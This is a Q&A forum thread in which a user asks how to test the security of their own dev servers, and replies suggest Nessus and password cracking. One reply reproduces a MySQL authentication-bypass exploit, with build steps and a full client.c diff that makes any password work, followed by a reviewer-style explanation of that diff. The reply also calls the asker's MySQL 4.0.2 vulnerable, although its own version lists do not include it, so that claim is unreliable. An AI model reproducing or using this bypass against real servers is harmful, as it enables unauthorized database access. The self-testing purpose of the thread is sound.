chigs20

asked on

How to hack my server

To all,

I would like to try to hack our dev servers (they are a replication of our production servers).  We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables.  But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure.  We already do port scanning to ensure there aren't any extra open ports that aren't being used.  Are there applications that I can use for password hacking? etc.  Thanks for the help in advance.

Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
ASKER CERTIFIED SOLUTION
Chireru

This solution is only available to members.
owensleftfoot

Give nessus a go. http://www.nessus.org/
The version of MySQL is vulnerable to a NULL password:

Vulnerable Systems:
 * MySQL version 4.1 up to but not including 4.1.3
 * MySQL version 5.0

Immune Systems:
 * MySQL version 4.1.3

The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:

 * Download and unpack the MySQL 5.0.0-alpha source
 * Patch the sql-common/client.c file:
    sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
 * Configure and Make as usual

The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
<   if (passwd[0])
<   {
<     if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
<     {
<       *end++= SCRAMBLE_LENGTH;
<       scramble(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH;
<     }
<     else
<     {
<       scramble_323(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH_323 + 1;
<     }
<   }
<   else
<     *end++= '\0';                               /* empty password */
---
>   sprintf(end,"\x14\x00");
>   end+=2;
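
Review bot: the two replacement lines at 1941-1942 remove the `if (passwd[0])` test and both the `scramble()` and `scramble_323()` calls, so the authentication bytes the client sends no longer depend on `passwd` or on the server's `mysql->scramble` value at all. The `CLIENT_SECURE_CONNECTION` capability test is dropped as well, so the same two bytes go out whichever protocol the server advertises. Because the whole change sits in `sql-common/client.c`, no client-side setting can prevent it; the check to make on your own servers is the server version against the lists above (4.1 up to but not including 4.1.3 and 5.0 listed as vulnerable, 4.1.3 listed as immune), with any host in the vulnerable range upgraded. Note also that `sprintf(end,"\x14\x00")` passes raw bytes as a format string and relies on the string terminator for the second byte, which is easy to misread when auditing this diff.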


Also, to check your security, use a password crack on your own system and see if it can crack them.
Just tell us your IP ;)
SOLUTION